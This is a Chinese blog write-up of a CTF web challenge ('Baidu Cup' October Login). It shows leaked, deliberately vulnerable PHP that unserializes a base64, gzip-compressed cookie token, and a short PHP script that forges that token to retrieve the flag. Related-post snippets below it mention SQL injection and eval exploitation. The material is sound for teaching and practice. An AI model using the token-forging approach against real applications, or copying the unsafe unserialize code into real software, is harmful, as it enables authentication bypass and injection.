“百度杯”CTF比赛 十月场 -------Login

最新推荐文章于 2024-07-27 14:01:17 发布
最新推荐文章于 2024-07-27 14:01:17 发布
阅读量3.3k 收藏 1
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/81348117
版权

=============================================================

个人收获:

1.多观察网页的源代码

2.多留意http的访问信息

3.多留意http头参数的变化

4.收获了unserialize,gzuncompress参数的认识

===============================================================

 

 

题目界面

第一反应是通过burp抓包然后放到sqlmap里面去跑看看有什么有用的信息

自己手测发现页面只会跳出一个error并没有什么有用的信息

然后右键查看源码发现 test1,test1

题主还特地放在很下面 需要滚下去才能看到

 

然后用test1 test1成功登陆但是页面显示这个

看到这个第一反应就是看源代码然而并没有什么发现,然后通过burp抓包发现在http头里面有一个特别的参数show

这个参数挺可疑的,尝试把show:0(注意英文字符,冒号后面有一个空格)放到请求包里面测试下发现结果还是一样

但是换成了show:1就出现惊喜了

 

代码如下

<!-- <?php
include 'common.php';
$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
class db
{
  public $where;
  function __wakeup()
  {
    if(!empty($this->where))
    {
      $this->select($this->where);
    }
  }
  function select($where)
  {
    $sql = mysql_query('select * from user where '.$where);
    return @mysql_fetch_array($sql);
  }
}
if(isset($requset['token']))
{
  $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  $db = new db();
  $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
  if($login['user'] === 'ichunqiu')
  {
    echo $flag;
  }else if($row['pass'] !== $login['pass']){
    echo 'unserialize injection!!';
  }else{
    echo "(╯‵□′)╯︵┴─┴ ";
  }
}else{
  header('Location: index.php?error=1');
}
?> -->

对他进行代码审计

 

发现这段

if($login['user'] === 'ichunqiu')
  {
    echo $flag;
  }else if($row['pass'] !== $login['pass']){
    echo 'unserialize injection!!';
  }else{
    echo "(╯‵□′)╯︵┴─┴ ";
  }
}else{
  header('Location: index.php?error=1');
}

 

那么login['user']从这段来

if(isset($requset['token']))
{
  $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  $db = new db();
  $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');

我们可以发现requset中获取token值然后对它进行unserialize,gzuncompress,base64_decode等一系列操作得到login,

 

unserialize:对单一的已序列化的变量进行操作,将其转换回 PHP 的值

gzuncompress:解压被压缩的字符串

 

然后在login中获取键为user的值,如果等于ichunqiu就得出flag

那么我们只要对user:ichunqiu进行一系列逆操作就行

 

<?php
$a = array("user"=>'ichunqiu');
$a = base64_encode(gzcompress(serialize($a)));
echo $a

?>

得出

 

我们只要在Cookie中填入  token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==;在发送过去就能获得flag

 注意token前面有个空格,结尾有个分号

大方子
关注
专栏目录
百度CTF比赛 十月 Login
drip_big的博客
04-17 1362
百度CTF比赛 十月 Login 1 进去就是一个长得还可以的登入界面,查看源码没看到注释,以为没有,开始对其进行sql注入测试,在 burp suite多次尝试,没找到注入点与注入语句。返回的结果只有error。 // test1 test1 这是藏在源码下方需要下移才看得到的注释; 没啥实际意义,两个:可能是账号密码 试一下登入成功 2 返回页面几乎啥也没有,刷新截取报文看看有什...
百度CTF比赛 十月 Web-Hash
qq_34106499的博客
01-21 619
1. 细心查看源码 2. MD5加密与解密 3. PHP中序列化与反序列化的应用 4. 反序列化中正则表达式与强制文件名限制的绕过 5. base64加密与解密 6. eval函数中执行php源码的漏洞利用 7. eval函数中执行系统命令时绕过addslash函数
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2676
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
CTF是什么?一文带你读懂网络安全大赛
最新发布
wly55690的博客
07-27 1551
💻随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。💂互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。👨‍👨‍👧‍👦网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛
百度十月web ---login
weixin_30245867的博客
04-08 114
首先一看的题,既然是是web类的,就要查看源码,一看,最先有一行注释,估摸着是用户名和密码 果然登录上去了,显示一段乱码,源码也没有什么东西, 那就抓一次包吧 发现响应头里边有个show:0的响应,而请求头没有,所以构造一个show:1 出现memeter.php的源文件 加了三层密,解密 出现一段base64,再看源文件,发现是cookie里边的token 直接在请求头...
百度CTF比赛 十月--hash
Oavinci的博客
05-22 598
知识点: 正则表达式绕过(+) __wakeup()绕过方法 源代码提示: hash解码得到sign=kkkkkk01 构造: ?key=111&hash=adaa10eef3a02754da03b5a3a6f40ae6 得到: Gu3ss_m3_h2h2.php <?php class Demo { private $file = 'Gu3ss_m3_h2h2.php'; public function __construct($fil...
i春秋 “百度CTF比赛 十月 hash writeup
weixin_43442029的博客
01-12 429
0x00 打开链接后,是一个hahaha的超链接,点进去以后要用key的值不是123的hash值过关,源代码里提示是MD5加密,在key前还有一段8位的sign值。 于是在网上找MD5解密的网站,解出来 sign = kkkkkk01 用122作为key,拼上sign的值,MD5加密后得到 hash = e1ebb04a0a78afe23e2d542e72a25005 输入正确的ke...
BugkuCTF-WEB题login1
am_03的博客
08-29 1362
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1537
1. mysql盲注及脚本编写 2. .git泄露
百度CTF比赛 十二月--notebook
Oavinci的博客
05-22 765
知识点: PHPinfo中 open_basedie设置用户访问文件的活动范围,其指定的限制实际上是前缀,而不是目录名。 举个例子: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/user1"都可访问。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。例如设置成:"open_basedir = /dir/user/" session.save_path是session文件存在的位置 session 的文件名格式为 sess_.
百度CTF比赛 十一月Mangager
wjd19980925的博客
04-13 516
百度CTF比赛 十一月Mangager
ctf竞赛ctf
08-07
ctf 实验步骤 
CTF日记之 “百度CTF比赛 十月 GetFlag
sunleibaba的博客
01-27 567
CTF日记:“百度CTF比赛 十月 GetFlag 打开题目,看到一个被嘲讽的界面,然鹅自己并不是单身狗。。。正常思路,查看源码,发现正常,之后点击login: 还是先查看源码,发现有没有疏漏什么东西,发现一切正常,在进行抓包看看有没有什么疏漏的东西,发现也一切正常,下面开始把关注点放在这个页面上面。正常的登录框,再加上一个验证码,这个验证码的意思是:一个数的md5值的前六位是afce73,那我们就进行爆破计算: python脚本 import hashlib i=1 while True:
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 421
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 十月 Login
feng的博客
09-10 506
WP 打开环境后发现是一个登录的界面,随便试了试发现返回error。 我们f12查看一下源代码,拉到最下面发现了这个: <!-- test1 test1 --> 我以前还真没遇到过用户名和密码直接给在源码里的,而且我以为这题应该就是一个漫长的获得用户名和密码的过程,所以以为这个test1是其他的东西。之后因此进行了很多无用的尝试。。。 我们应该直接用户名和密码输入test1,就可以成功登录,但是打开却是这个东西: 看到这个我的第一反应是颜文字,因为以前碰巧接触过。但是又不是很了解,以为下一
百度CTF比赛 十月 GetFlag
feng的博客
09-30 553
这题主要考察了用python写脚本来爆破md5,然后是SQL注入中的万能密码,然后是文件下载后最后对eval函数的考察。
ctf-wp“百度CTF比赛 十月-LOGIN
key_nothing的博客
09-28 1104
进去题目看到一个登陆框,老规矩,看源码: 看起来好像没什么有用的信息,突然发现可以下拉。。。 找到test1,test1 (差点没发现T—T) 登陆: 出来了一个莫名其妙的东西。。 上burp抓包看看: 好像没有什么异常,但是仔细观察,发现返回中有个叫“show”的参数,值为零。尝试将参数show添加到请求,值改为1,看结果: 源码来了。 &amp;amp;amp;amp;amp;amp;lt;head&amp;amp;amp;amp;amp;am
一道简单的CTF登录题题解
anquanniu的博客
03-06 8256
一、解题感受 这道题50分,在实验吧练习算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成题目。 所以本文主要是在pc...
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 4883
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值